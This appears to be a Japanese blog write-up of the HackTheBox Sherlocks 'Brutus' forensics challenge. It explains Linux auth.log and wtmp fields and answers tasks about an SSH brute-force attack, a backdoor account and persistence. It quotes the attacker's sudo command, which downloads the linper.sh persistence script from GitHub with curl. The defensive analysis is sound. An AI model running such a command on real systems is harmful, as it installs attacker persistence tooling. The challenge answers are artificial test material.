banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

hackthebox SherlocksのBrutusターゲットの記録

image

カテゴリ:Linux フォレンジック、DFIR

このシナリオでは、auth.log と wtmp の 2 つのファイルが提供されます。

このシナリオの焦点は、Linux の auth.log と wtmp ファイルに関する知識であり、auth.log ファイルの理解を深めることができます。これは、フォレンジックでよく見られるログファイルです。

auth.log ファイルは、Linux システムで認証に関連するログを記録するためのものであり、特に Debian ベースのディストリビューションで使用されます。主にシステムの認証イベントを記録し、成功したログイン試行、ユーザーの切り替え、sudo コマンドの使用、SSH 接続などが含まれます。

auth.log の各フィールドの説明:

  • タイムスタンプ:ログが生成された日付と時刻
  • ホスト名:Linux マシンの名前
  • プロセス名:プロセスの名前
  • プロセス ID:プロセス ID 識別子
  • ユーザー:認証プロセスに関与するユーザー名
  • 認証ステータス:認証試行が成功したか失敗したかを詳細に説明します
  • IP アドレス:リモート接続の試行元 IP
  • メッセージの内容:
Aug  8 12:34:56 hostname sshd[12345]: Failed password for root from 192.168.1.100 port 54321 ssh2

WTMP ファイル

wtmp ファイルは、Mac ではutmpdumpツールを使用して表示できます。Linux サーバーでは、lastコマンドを使用して wtmp ログを表示できます。

image

utmpdumpの出力には、wtmpファイルのバイナリ形式からデコードされた複数のフィールドが含まれています。以下に各フィールドの説明を示します:

  • タイプ:レコードのタイプを示します。ユーザーログインまたはログアウト、システムの起動またはシャットダウンイベントなどがあります。
  • プロセス ID:イベントに関連するプロセス識別子
  • ライン:ユーザーがログインした端末ライン(tty または pts)
  • 識別子:ラインフィールドに関連する短い識別子
  • ユーザー:イベントに関連するユーザー名
  • ホスト:該当する場合、システムへのユーザーアクセスのホスト名または IP アドレス
  • 終了:セッションまたはプロセスの終了ステータス
  • セッション:セッション ID
  • 時間:イベントのタイムスタンプ
  • アドレス:追加のアドレス情報。リモートログインの場合、IP アドレスかもしれません。

Task1 auth.log ログを確認すると、攻撃者がブルートフォース攻撃に使用した IP アドレスを特定できますか?

cat auth.log | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r xxx --color=auto | grep "Invalid user"

65.2.161.68

Task2 ブルートフォース攻撃により、攻撃者はサーバー上の 1 つのアカウントに侵入しました。では、このアカウントのユーザー名は何ですか?

root

Task3 攻撃者がサーバーにログインして計画を実行した具体的な時間を特定できますか?

image

タイムゾーンの差があるため、8 を引く必要があります。14:32:45 - 8:00:00 = 06:32:45

2024-03-06 06:32:45

Task4 SSH セッションはユーザーログイン時に追跡され、各セッションには番号が割り当てられます。問題 2 で説明されたシナリオでは、攻撃者が使用したアカウントでログイン後、セッションにはどの番号が割り当てられましたか?

cat auth.log | grep "root"

37

image

Task5 攻撃者はサーバー上にバックドアアカウントを作成し、このアカウントにより高い権限レベルを設定しました。では、このアカウントの名前は何ですか?

cat auth.log | grep "Accept"

cyberjunkie

image

Task6 MITRE ATT&CK の持続化に関連するサブテクニックの ID は何ですか?

https://attack.mitre.org/techniques/T1136

image

Task7 前に確認したログイン時間と認証ログファイルに記録されたセッション終了時間に基づいて、攻撃者が SSH 接続を初めて確立してからの持続時間は何秒ですか?

32.45 から 37:24 まで

240+39

Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.

Mar  6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.

Task8 攻撃者はバックドアアカウントにログインし、より高い権限でスクリプトをダウンロードしました。sudo を使用して実行された完全なコマンドは何ですか?

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

image

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。